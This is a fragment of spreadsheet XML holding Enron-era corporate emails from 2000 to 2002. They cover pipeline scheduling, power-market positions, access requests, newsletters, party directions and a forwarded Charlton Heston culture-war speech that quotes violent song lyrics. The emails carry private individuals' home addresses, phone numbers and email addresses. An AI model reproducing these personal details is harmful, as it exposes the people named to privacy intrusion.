3.  Stay on Bissonnet for about 1/2 mile.  On the right you will see a gray _x000D_
apartment complex called "Maryland Manor".  The street right there is _x000D_
"Ashby", make a right on Ashby._x000D_
4.  The first left is Wroxton Court.  I am in the upstairs of the duplex at _x000D_
1714 Wroxton Court, but you probably will just want to walk around to the _x000D_
back yard._x000D_
_x000D_
My phone no. is case there are any problems is (713) 529-1038.  I look _x000D_
forward to seeing you there!_x000D_
_x000D_
_x000D_
 - Black Bean Dip.doc_x000D_
 - RoastRdPepperDip.doc_x000D_
 - Cheesy Herb and Garlic Bread.doc_x000D_
 - ShrimpGazpacho.doc_x000D_
 - PorkChopsMangoBasilSauce.doc_x000D_
 - ScallopedPotatoes.doc_x000D_
 - DeathbyChocolate.doc</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 09:16:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carol.st.@enron.com', 'elizabeth.sager@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Dec expiring LCs</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the dec list of expiring lc's.  I will be happy to walk you through questions._x000D_
_x000D_
Tanya_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 24 May 2001 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'max.brown@enron.com'})</t>
  </si>
  <si>
    <t>Re: Concern - Possible Change In Smartpigging Dates</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a reason we think we will need to run station 8.  I think with the volumes we will have to move to insure 6 miles and hour for the smart pig_x000D_
will be approx. 100 to 200 m2.  If my thinking is wrong please let me know.  _x000D_
_x000D_
DS_x000D_
_x000D_
_x000D_
From:	Max Brown/ENRON@enronXgate on 05/23/2001 09:13 AM_x000D_
To:	Earl Chanley/ET&amp;S/Enron@ENRON, James Moore/ET&amp;S/Enron@ENRON_x000D_
cc:	Rich Jolly/ET&amp;S/Enron@ENRON, Darrell Schoolcraft/ET&amp;S/Enron@ENRON, Perry Frazier/ET&amp;S/Enron@ENRON, Jerry Graves/ET&amp;S/Enron@ENRON, David L Johnson/ENRON@enronXgate, Rick Craig/ENRON@enronXgate, Randy Rice/ENRON@enronXgate, Arnie Bailey/ET&amp;S/Enron@ENRON, Rick Smith/ET&amp;S/Enron@ENRON, David Roensch/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Concern - Possible Change In Smartpigging Dates_x000D_
_x000D_
This is to advise that if we are now actively looking at rescheduling the smartpigging dates that was previously agreed upon at our Albuquerque mtg on April 11th, we need to know ASAP.  We do not have alot of flexibility in juggling schedules based on smartpig tool availability, but we can sure check and see what shakes out._x000D_
_x000D_
Plz let me know at the earliest possible date what the plans are here._x000D_
_x000D_
Thanks - Max_x000D_
_x000D_
_x000D_
(Comments extracted from Engineering and Construction Weekly by Arnie Bailey)_x000D_
TW - Station 6-7 &amp; Station 7-8 Smart Pigging - C.014524/C.014527_x000D_
Project will conflict with Station 8 Automation Project if conducted in September or later.  Actively chasing TD Williams and PII for their cost estimates.  Must review costs to determine if dollars are sufficient.  Project should try to be a done in August or sooner if at all possible._x000D_
Contact:  Earl Chanley, Houston, (713) 345-6816/ James Moore, Houston,(713) 345-6815_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 8 Oct 2000 14:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Signature authority</t>
  </si>
  <si>
    <t xml:space="preserve">Not this week.  Maybe next week._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ben F Jacoby @ ECT                           10/06/2000 09:57 AM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Signature authority_x000D_
_x000D_
  _x000D_
_x000D_
Kay:_x000D_
_x000D_
My legal name is Ben F. Jacoby. Did I make VP?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kay Mann @ ENRON                           10/05/2000 09:28 AM_x000D_
	_x000D_
_x000D_
To: Ben Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Signature authority_x000D_
_x000D_
_x000D_
_x000D_
Hi Ben,_x000D_
_x000D_
Janet has requested that we set you up with signature authority for _x000D_
development documents.  How do you want you name to read on the corporate _x000D_
documents?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:51:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dschneider@challiance.org'})</t>
  </si>
  <si>
    <t>Deborah Schneider_x000D_
83 Elm Street 2_x000D_
Jamaica Plain, MA 02130_x000D_
dschneider@challiance.org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Deborah Schneider</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 16:50:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'419899.247679897.1@newsbyemail.ft.com'})</t>
  </si>
  <si>
    <t>Work smart. Be smart. Have fun.</t>
  </si>
  <si>
    <t>Dear FT.com user_x000D_
_x000D_
Click the following link to experience an interactive online_x000D_
learning tool from FT New York Institute of Finance:_x000D_
http://tm0.com/821/sbct.cgi?s=247679897&amp;i=419899&amp;d=2017208_x000D_
_x000D_
NYIF Online is the virtual classroom of the FT New York _x000D_
Institute of Finance. To maintain your competitive edge _x000D_
and advance your career, all you need is a modem, a _x000D_
browser, and a good sense of humor. Learning with NYIF_x000D_
Online is that simple. Our web-based courses feature _x000D_
expert faculty, lively animations, and interactive _x000D_
exercises to ensure that you're learning. Plus,_x000D_
the courses are available 24 hours a day. So whether _x000D_
you're at home, at work or on a business trip, with _x000D_
NYIF Online you always receive the most up-to-date, _x000D_
practical information and training._x000D_
_x000D_
NYIF Online. All the financial expertise you need. Twice the_x000D_
creativity._x000D_
_x000D_
Visit http://tm0.com/821/sbct.cgi?s=247679897&amp;i=419899&amp;d=2017209 _x000D_
to demo an actual NYIF Online program._x000D_
_x000D_
For more information, please contact 212-641-6663._x000D_
_x000D_
FT New York Institute of Finance_x000D_
1330 Avenue of the Americas, 16th Fl._x000D_
New York, NY 10019_x000D_
+1 212 641-6663_x000D_
elearning@nyif.com_x000D_
www.nyif.com/online_x000D_
_x000D_
_x000D_
Yours sincerely_x000D_
_x000D_
_x000D_
FT.com_x000D_
_x000D_
_x000D_
To unsubscribe from this FT.com correspondence, please _x000D_
reply to this message with the single word 'unsubscribe' _x000D_
in the subject line. Your name will then be removed _x000D_
from our mailing list.</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 00:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>Meeting with Cementos de Chihuahua</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Stephanie Miller/Corp/Enron on 12/01/2000 _x000D_
08:33 AM ---------------------------_x000D_
   _x000D_
	Enron de Mexico_x000D_
	_x000D_
	From:  Barbara Martinez                           11/30/2000 07:51 PM_x000D_
	_x000D_
_x000D_
To: Stephanie Miller/Corp/Enron@ENRON, John Hodge/Corp/Enron@ENRON_x000D_
cc: Jaime Williams/NA/Enron@ENRON _x000D_
_x000D_
Subject: Meeting with Cementos de Chihuahua_x000D_
_x000D_
Just to inform you  in case you want to join Jaime Williams, the Meeting with _x000D_
Cementos Chihuahua it is scheduled next Tuesday, December 5  at 11:00 a.m.  _x000D_
And  will take place in the Cementos Chihuahua's office._x000D_
_x000D_
Address:_x000D_
Vicente Su?rez y 6a. Avenida _x000D_
Chihuahua, Chih. _x000D_
Ph. (14)24-0090 /(14)24-0408_x000D_
_x000D_
If you need of further assistance, please let me know._x000D_
_x000D_
Regards,_x000D_
Barbara_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Mar 2000 00:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.gandy@enron.com'})</t>
  </si>
  <si>
    <t>Referral</t>
  </si>
  <si>
    <t xml:space="preserve">Vince -_x000D_
_x000D_
I work in the Caribbean Structuring Group and previously worked at Entergy _x000D_
Power Marketing on the Structuring desk with Gary Zhu.  I am attaching the _x000D_
resume of a friend from Entergy who holds a PhD in Operations Research.  He _x000D_
is considering a move from Entergy and from speaking with Li Xiao I thought _x000D_
that your group might be a good fit for him.  Please call with any questions _x000D_
(x 67446)._x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 04:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.parquet@enron.com', 'tim.belden@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Summaries of Positions</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are cryptic summaries of the current positions.  WPTF, APX, ISO and _x000D_
IEP are all fairly similar.  Enron is working with those parties to develop a _x000D_
common proposal.  The "Reform Coalition" (RC) is Hogan, sponsored by Sempra, _x000D_
with ORA/TURN/UCAN (they are all nuts), Reliant, Southern and WIlliams.  _x000D_
Without the gens, they were going nowhere.  Southern has already left the _x000D_
coalition.  We and others have put a full court press on to Reliant (the _x000D_
source of the problem is John Stout in Houston).  The word is that Reliant _x000D_
will also leave -- we're hoping for a big splash saying both Southern and _x000D_
Reliant have left._x000D_
_x000D_
The other confusing issue is --why Sempra/San Diego G&amp;E?  Terry Winter, ISO _x000D_
CEO and former officer at SDG&amp;E, says that Sempra thinks nodalism is the only _x000D_
way to get prices high enough in San Diego to encourage construction of more _x000D_
power plants.  More power plants, more gas sales.  _x000D_
_x000D_
The first item is a matrix from mid-April laying out all the positions at the _x000D_
time.  The RC has now introduced a slightly new proposal called "voluntary" _x000D_
-- the concept being that you may opt for nodal or zonal on a month-by-month _x000D_
basis.  This had not much support at the meeting at the ISO on May 10 and 11 _x000D_
-- especially since you end up with nodalism anyway._x000D_
_x000D_
The next item is a VERY LONG (45 pps) ISO doc -- the ISO proposal is called _x000D_
zonal forward -- from late April._x000D_
_x000D_
I also included APX's "flowgate" model, which has some intriquing _x000D_
characteristics and which we can support with some slight modifications (it's _x000D_
very close to what we have proposed, and may be easier to use in a world with _x000D_
more parallel flows than we have today)_x000D_
_x000D_
If you want more, more, MORE -- go to the ISO web site (caiso.com) then to _x000D_
Client Services, then to congestion reform, to see all the gory detail._x000D_
_x000D_
    </t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 03:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cbciiivent@aol.com'})</t>
  </si>
  <si>
    <t>Re: D's Address</t>
  </si>
  <si>
    <t>Thanks, C_x000D_
B</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 11:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Sonoma Coast Viticulture contact</t>
  </si>
  <si>
    <t xml:space="preserve">You are so sweet.  Thanks so much.  What's new?  What are we doing on the _x000D_
Friday of Eldon's b-day?_x000D_
_x000D_
_x000D_
_x000D_
	Nancy Sellers &lt;Nancy.Sellers@RobertMondavi.com&gt;_x000D_
	02/27/2001 07:06 PM_x000D_
		 _x000D_
		 To: "'Jeff Dasovich'" &lt;Jeff_Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Sonoma Coast Viticulture contact_x000D_
_x000D_
Finally - here is the name of the contact _x000D_
 -----Original Message----- _x000D_
From:   Patrick DeLong  _x000D_
Sent:   Tuesday, February 27, 2001 4:58 PM _x000D_
To:     Nancy Sellers _x000D_
Subject:        Sonoma Coast Viticulture contact _x000D_
Nancy, sorry this took a while, but it will be worth it.  If anybody knows _x000D_
about the Sonoma Coast, it's this guy.  He's done work with Flowers, Kistler, _x000D_
etc. out there.  His name is Greg Bjornstad (sp.?) and his number is (707) _x000D_
829-1687.  He doesn't really know me from a hole in the ground but you can _x000D_
"double reference" my name as Todd Graff's friend.  Todd is the winemaker at _x000D_
Sonoma Creek and is a good friend of mine who worked with Eric on some _x000D_
projects._x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 08:56:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>Prices Again</t>
  </si>
  <si>
    <t>This Wed or Thurs, could you update the monthly Cal '02 prices for me again?_x000D_
_x000D_
							Permian_x000D_
							San Juan	_x000D_
							SoCalGas_x000D_
_x000D_
Hopefully, this will be the last time.  I need to give Tracy the final version of an abbreviated presentation (for Ken Lay mtg 11/8) by the end of this week.  I just wanted to refresh the numbers one more time.</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'bryan.hull@enron.com', 'david.baumbach@enron.com', 'brettlawler@hotmail.com', 'shelleyzee@mail.utexas.edu', 'danielles@jonesgranger.com', 'brian.hoskins@enron.com', 'phillip.love@enron.com', 'mballases@hotmail.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'chad.landry@enron.com', 'matthew.lenhart@enron.com', 'yvette.connevey@enron.com'})</t>
  </si>
  <si>
    <t>Fw: Winning the cultural war</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 02/02/2000 03:33 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Larry W. Bass" &lt;lwbthemarine@bigplanet.com&gt; on 02/02/2000 03:02:07 PM_x000D_
To: Daphneco64@aol.com_x000D_
cc: jasnbass@swbell.net, Eric Bass/HOU/ECT@ECT _x000D_
Subject: Fw: Winning the cultural war_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message ----- _x000D_
From: Frank Marsters_x000D_
To: Adams, George_x000D_
Sent: Friday, January 28, 2000 12:15 PM_x000D_
Subject: Fw: Winning the cultural war_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message ----- _x000D_
From: Ted &amp; Carla_x000D_
To: Mike Ferguson_x000D_
Sent: Thursday, January 27, 2000 10:45 PM_x000D_
Subject: Winning the cultural war_x000D_
_x000D_
_x000D_
Mike, here is the speach by Charlton Heston that I was telling you about._x000D_
Subject:_x000D_
        Winning the Cultural War by Charlton Heston_x000D_
   Date:_x000D_
        Tue, 16 Mar 1999 20:47:56 -0600_x000D_
   From:_x000D_
        "Koenig's International News" &lt;bill@watch.org&gt;_x000D_
     To:_x000D_
        watch-news@watch.org_x000D_
_x000D_
_x000D_
_x000D_
Note from Bill Koenig:_x000D_
_x000D_
Below is an excellent message given by Charlton Heston at Harvard._x000D_
Rush Limbaugh today said he has received 9000 e-mail requests for a_x000D_
copy._x000D_
_x000D_
It is entitled 'Winning the Cultural War' and was given at the_x000D_
Harvard Law School Forum, February 16, 1999._x000D_
_x000D_
************_x000D_
_x000D_
I remember my son when he was 5, explaining to his kindergarten_x000D_
class what his father did for a living. "My Daddy," he said,_x000D_
"pretends to be people." There have been quite a few of them._x000D_
Prophets from the Old and New Testaments, a couple of_x000D_
Christian saints, generals of various nationalities and different_x000D_
centuries, several kings, three American presidents, a French_x000D_
cardinal and two geniuses, including Michelangelo. If you want the_x000D_
ceiling re-painted I'll do my best. There always seem to be a lot_x000D_
of different fellows up here. I'm never sure which one of them gets_x000D_
to talk. Right now, I guess I'm the guy._x000D_
_x000D_
As I pondered our visit tonight it struck me: If my creator gave me_x000D_
the gift to connect you with the hearts and minds of those_x000D_
great men, then I want to use that same gift now to re-connect you_x000D_
with your own sense of liberty ... your own freedom of_x000D_
thought ... your own compass for what is right. Dedicating the_x000D_
memorial at Gettysburg, Abraham Lincoln said of America, "We are_x000D_
now engaged in a great Civil War, testing whether this nation or_x000D_
any nation so conceived and so dedicated can long_x000D_
endure." Those words are true again. I believe that we are again_x000D_
engaged in a great civil war, a cultural war that's about to_x000D_
hijack your birthright to think and say what resides in your heart._x000D_
I fear you no longer trust the pulsing lifeblood of liberty inside_x000D_
you ... the stuff that made this country rise from wilderness into_x000D_
the miracle that it is._x000D_
_x000D_
Let me back up. About a year ago I became president of the National_x000D_
Rifle Association, which protects the right to keep and_x000D_
bear arms. I ran for office, I was elected, and now I serve ... I_x000D_
serve as a moving target for the media who've called me_x000D_
everything from "ridiculous" and "duped" to a "brain-injured,_x000D_
senile, crazy old man." I know ... I'm pretty old ... but I sure_x000D_
thank the Lord ain't senile. As I have stood in the crosshairs of_x000D_
those who target Second Amendment freedoms, I've realized that_x000D_
firearms are not the only issue. No, it's much, much bigger than_x000D_
that. I've come to understand that a cultural war is raging across_x000D_
our land, in which, with Orwellian fervor, certain acceptable_x000D_
thoughts and speech are mandated._x000D_
_x000D_
For example, I marched for civil rights with Dr. King in 1963 --_x000D_
long before Hollywood found it fashionable. But when I told an_x000D_
audience last year that white pride is just as valid as black pride_x000D_
or red pride or anyone else's pride, they called me a racist._x000D_
_x000D_
I've worked with brilliantly talented homosexuals all my life. But_x000D_
when I told an audience that gay rights should extend no_x000D_
further than your rights or my rights, I was called a homophobe._x000D_
_x000D_
I served in World War II against the Axis powers. But during a_x000D_
speech, when I drew an analogy between singling out innocent Jews_x000D_
and singling out innocent gun owners, I was called an anti-Semite._x000D_
_x000D_
Everyone I know knows I would never raise a closed fist against my_x000D_
country. But when I asked an audience to oppose this_x000D_
cultural persecution, I was compared to Timothy McVeigh._x000D_
_x000D_
&gt;From Time magazine to friends and colleagues, they're essentially_x000D_
saying, "Chuck, how dare you speak your mind. You are_x000D_
using language not authorized for public consumption!"_x000D_
_x000D_
But I am not afraid. If Americans believed in political_x000D_
correctness, we'd still be King George's boys-subjects bound to the_x000D_
_x000D_
British crown._x000D_
_x000D_
In his book, "The End of Sanity," Martin Gross writes that_x000D_
"blatantly irrational behavior is rapidly being established as the_x000D_
norm in almost every area of human endeavor. There seem to be new_x000D_
customs, new rules, new anti-intellectual theories regularly_x000D_
foisted on us from every direction._x000D_
_x000D_
Underneath, the nation is roiling. Americans know something,_x000D_
without a name is undermining the nation, turning the mind_x000D_
mushy when it comes to separating truth from falsehood and right_x000D_
from wrong. And they don't like it."_x000D_
_x000D_
Let me read a few examples. At Antioch college in Ohio, young men_x000D_
seeking intimacy with a coed must get verbal permission at each_x000D_
step of the process from kissing to petting to final copulation ..._x000D_
all clearly spelled out in a printed college directive. In New_x000D_
Jersey, despite the death of several patients nationwide who had_x000D_
been infected by dentists who had concealed their AIDS --- the_x000D_
state commissioner announced that health providers who are_x000D_
HIV-positive need not. .. need not ... tell their patients that_x000D_
they are infected._x000D_
_x000D_
At William and Mary, students tried to change the name of the_x000D_
school team "The Tribe" because it was supposedly insulting_x000D_
to local Indians, only to learn that authentic Virginia chiefs_x000D_
truly like the name._x000D_
_x000D_
In San Francisco, city fathers passed an ordinance protecting the_x000D_
rights of transvestites to cross-dress on the job, and for_x000D_
transsexuals to have separate toilet facilities while undergoing_x000D_
sex change surgery._x000D_
_x000D_
In New York City, kids who don't speak a word of Spanish have been_x000D_
placed in bilingual classes to learn their three R's in_x000D_
Spanish solely because their last names sound Hispanic. At the_x000D_
University of Pennsylvania, in a state where thousands died_x000D_
at Gettysburg opposing slavery, the president of that college_x000D_
officially set up segregated dormitory space for black students._x000D_
Yeah, I know ... that's out of bounds now. Dr. King said "Negroes."_x000D_
Jimmy Baldwin and most of us on the March said "black." But it's a_x000D_
no-no now._x000D_
_x000D_
For me, hyphenated identities are awkward ... particularly_x000D_
"Native-American." I'm a Native American, for God's sake. I also_x000D_
happen to be a blood-initiated brother of the Miniconjou Sioux. On_x000D_
my wife's side, my grandson is a 13th-generation Native American_x000D_
... with a capital letter on "American." Finally, just last month_x000D_
... David Howard, head of the Washington D.C. Office of Public_x000D_
Advocate, used the word "niggardly" while talking to colleagues_x000D_
about budgetary matters. Of course, 'niggardly' means stingy or_x000D_
scanty. But within days Howard was forced to publicly apologize and_x000D_
resign._x000D_
_x000D_
As columnist Tony Snow wrote: "David Howard got fired because some_x000D_
people in public employ were morons who (a) didn't know the meaning_x000D_
of 'niggardly,' (b) didn't know how to use a dictionary to discover_x000D_
the meaning, and ,actually demanded that he apologize for their_x000D_
ignorance." What does all of this mean? It means that telling us_x000D_
what to think has evolved into telling us what to say, so telling_x000D_
us what to do can't be far behind._x000D_
_x000D_
Before you claim to be a champion of free thought, tell me: Why did_x000D_
political correctness originate on America's campuses?_x000D_
And why do you continue to tolerate it? Why do you, who're supposed_x000D_
to debate ideas, surrender to their suppression?_x000D_
_x000D_
Let's be honest. Who here thinks your professors can say what they_x000D_
really believe? It scares me to death, and should scare_x000D_
you too, that the superstition of political correctness rules the_x000D_
halls of reason._x000D_
_x000D_
You are the best and the brightest. You, here in the fertile cradle_x000D_
of American academia, here in the castle of learning on the_x000D_
Charles River, you are the cream. But I submit that you, and your_x000D_
counterparts across the land, are the most socially_x000D_
conformed and politically silenced generation since Concord Bridge._x000D_
_x000D_
And as long as you validate that ... and abide it ... you are-by_x000D_
your grandfathers' standards-cowards._x000D_
_x000D_
Here's another example. Right now at more than one major_x000D_
university, Second Amendment scholars and researchers are_x000D_
being told to shut up about their findings or they'll lose their_x000D_
jobs. Why? Because their research findings would undermine_x000D_
big-city mayor's pending lawsuits that seek to extort hundreds of_x000D_
millions of dollars from firearm manufacturers._x000D_
_x000D_
I don't care what you think about guns. But if you are not shocked_x000D_
at that, I am shocked at you. Who will guard the raw_x000D_
material of unfettered ideas, if not you? Who will defend the core_x000D_
value of academia, if you supposed soldiers of free thought_x000D_
and expression lay down your arms and plead, "Don't shoot me." If_x000D_
you talk about race, it does not make you a racist. If you_x000D_
see distinctions between the genders, it does not make you a_x000D_
sexist. If you think critically about a denomination, it does not_x000D_
make you anti-religion. If you accept but don't celebrate_x000D_
homosexuality, it does not make you a homophobe._x000D_
_x000D_
Don't let America's universities continue to serve as incubators_x000D_
for this rampant epidemic of new McCarthyism. But what can you do?_x000D_
How can anyone prevail against such pervasive social subjugation?_x000D_
_x000D_
The answer's been here all along. I learned it 36 years ago, on the_x000D_
steps of the Lincoln Memorial in Washington D.C.,_x000D_
standing with Dr. Martin Luther King and two hundred thousand_x000D_
people. You simply ... disobey. Peaceably, yes. Respectfully, of_x000D_
course. Nonviolently, absolutely. But when told how to think or_x000D_
what to say or how to behave, we don't. We disobey social protocol_x000D_
that stifles and stigmatizes personal freedom._x000D_
_x000D_
I learned the awesome power of disobedience from Dr. King ... who_x000D_
learned it from Gandhi, and Thoreau and Jesus and every other great_x000D_
man who led those in the right against those with the might._x000D_
_x000D_
Disobedience is in our DNA. We feel innate kinship with that_x000D_
Disobedient spirit that tossed tea into Boston Harbor, that sent_x000D_
Thoreau to jail, that refused to sit in the back of the bus, that_x000D_
protested a war in Vietnam._x000D_
_x000D_
In that same spirit, I am asking you to disavow cultural_x000D_
correctness with massive disobedience of rogue authority, social_x000D_
directives and onerous law that weaken personal freedom._x000D_
_x000D_
But be careful ... it hurts. Disobedience demands that you put_x000D_
yourself at risk. Dr. King stood on lots of balconies. You must_x000D_
be willing to be humiliated ... to endure the modern-day equivalent_x000D_
of the police dogs at Montgomery and the water Cannons at Selma._x000D_
You must be willing to experience discomfort. I'm not Complaining,_x000D_
but my own decades of social activism have taken their toll on me._x000D_
Let me tell you a story._x000D_
_x000D_
A few years back I heard about a rapper named Ice-T who was selling_x000D_
a CD called "Cop Killer" celebrating ambushing and_x000D_
murdering police officers. It was being marketed by none other than_x000D_
Time/Warner, the biggest entertainment conglomerate in the world._x000D_
Police across the country were outraged. Rightfully so-at least one_x000D_
had been murdered. But Time/Warner was_x000D_
stonewalling because the CD was a cash cow for them, and the media_x000D_
were tiptoeing around it because the rapper was black._x000D_
_x000D_
I heard Time/Warner had a stockholders meeting scheduled in Beverly_x000D_
Hills. I owned some shares at the time, so I decided to attend._x000D_
What I did there was against the advice of my family and_x000D_
colleagues. I asked for the floor. To a hushed room of a_x000D_
thousand average American stockholders, I simply read the full_x000D_
lyrics of "Cop Killer"-every vicious, vulgar, instructional word._x000D_
_x000D_
"I GOT MY 12 GAUGE SAWED OFF_x000D_
I GOT MY HEADLIGHTS TURNED OFF_x000D_
I'm ABOUT TO BUST SOME SHOTS OFF_x000D_
I'm ABOUT TO DUST SOME COPS OFF..."_x000D_
_x000D_
It got worse, a lot worse. I won't read the rest of it to you. But_x000D_
trust me, the room was a sea of shocked, frozen, blanched_x000D_
faces. The Time/Warner executives squirmed in their chairs and_x000D_
stared at their shoes. They hated me for that._x000D_
_x000D_
Then I delivered another volley of sick lyric brimming with racist_x000D_
filth, where Ice-T fantasizes about sodomizing two 12-year old_x000D_
nieces of Al and Tipper Gore. "SHE PUSHED HER BUTT AGAINST MY ...."_x000D_
_x000D_
Well, I won't do to you here what I did to them. Let's just say I_x000D_
left the room in echoing silence._x000D_
_x000D_
When I read the lyrics to the waiting press corps, one of them said_x000D_
"We can't print that." "I know," I replied, "but Time/Warner _s_x000D_
selling it."_x000D_
_x000D_
Two months later, Time/Warner terminated Ice-T's contract. I'll_x000D_
never be offered another film by Warners, or get a good review from_x000D_
Time magazine. But disobedience means you must be willing to act,_x000D_
not just talk._x000D_
_x000D_
When a mugger sues his elderly victim for defending herself ... jam_x000D_
the switchboard of the district attorney's office. When your_x000D_
university is pressured to lower standards until 80 percent of the_x000D_
students graduate with honors ... choke the halls of the board of_x000D_
regents. When an 8-year-old boy pecks a girl's cheek on the_x000D_
playground and gets hauled into court for sexual harassment_x000D_
...march on that school and block its doorways._x000D_
_x000D_
When someone you elected is seduced by political power and betrays_x000D_
you ... petition them, oust them, banish them. When_x000D_
Time magazine's cover portrays millennium nuts as deranged, crazy_x000D_
Christians holding a cross as it did last month ... boycott_x000D_
their magazine and the products it advertises._x000D_
_x000D_
So that this nation may long endure, I urge you to follow in the_x000D_
hallowed footsteps of the great disobediences of history that_x000D_
freed exiles, founded religions, defeated tyrants, and yes, in the_x000D_
hands of an aroused rabble in arms and a few great men, by_x000D_
God's grace, built this country._x000D_
_x000D_
If Dr. King were here, I think he would agree._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - att1.htm_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 02:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Approval is Overdue: Access Request for stewart.range@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">I will ask him which specific directories he needs to access._x000D_
_x000D_
--Stinson_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
11/22/2000 08:08 AM_x000D_
To: Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Approval is Overdue: Access Request for stewart.range@enron.com_x000D_
_x000D_
Stinson,_x000D_
_x000D_
Should we do it?_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 11/22/2000 _x000D_
08:08 AM ---------------------------_x000D_
_x000D_
_x000D_
ARSystem@mailman.enron.com on 11/21/2000 07:04:54 PM_x000D_
To: vince.j.kaminski@enron.com_x000D_
cc:  _x000D_
Subject: Approval is Overdue: Access Request for stewart.range@enron.com_x000D_
_x000D_
_x000D_
This request has been pending approval for  2 days and you are the _x000D_
alternate.  Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000007876&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000007876_x000D_
Approver            : stinson.gibner@enron.com_x000D_
Request Create Date : 11/20/00 2:36:29 PM_x000D_
Requested For       : stewart.range@enron.com_x000D_
Resource Name       : \\enehou\houston\common\Research - [Read/Write]_x000D_
Resource Type       : Directory_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Jul 2001 01:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.sifert@csfb.com'})</t>
  </si>
  <si>
    <t>CSFB Independent Power Weekly--Issue #37; CSFB Power Generation S_x000D_
 upply Chain Conference on 9/10 and 9/11</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
Attached, please find the latest issue of our Independent Power Weekly._x000D_
_x000D_
 &lt;&lt;IPW073001.pdf&gt;&gt;_x000D_
Also note that on September 10 and 11, CSFB will host a Power Generation_x000D_
Supply Chain Conference at the Plaza Hotel in New York City.  This event is_x000D_
designed to provide investors with a wholistic perspective on all aspects of_x000D_
the sector-from coal and natural gas companies, to equipment and_x000D_
construction service providers, to the power producers themselves.  Please_x000D_
contact us if you would like additional information._x000D_
_x000D_
Summary:_x000D_
1. IPPs Fall 0.9%   Last week our IPP composite traded off 0.9%, slightly_x000D_
underperforming both the NASDAQ (0.0%) and the S&amp;P 500 (-0.4%)  Reliant_x000D_
Resources was the strongest performer, rising 6.9%.  NRG Energy was the_x000D_
weakest, declining 10%._x000D_
_x000D_
2. One of the Most Volatile Weeks of the Year   In terms of stock price_x000D_
performance, last week was one of the most volatile weeks of the year for_x000D_
the Independent Power Producers.  On Monday (7/23) and Tuesday (7/24) the_x000D_
group declined by over 10% before staging a dramatic recovery to end the_x000D_
week barely unchanged.  We attribute the week's initial downturn to concerns_x000D_
early in the week surrounding "soft" power market conditions.  The recovery_x000D_
during the second half of the week reflected a number of factors, including:_x000D_
1) Analysis indicates that power markets have been more stable than_x000D_
generally believed; 2) Earnings results continue to exceed expectations; 3)_x000D_
Depressed valuations provide a cushion for stock prices; and, 4) On 7/25 the_x000D_
FERC issued a favorable order on generator refunds._x000D_
_x000D_
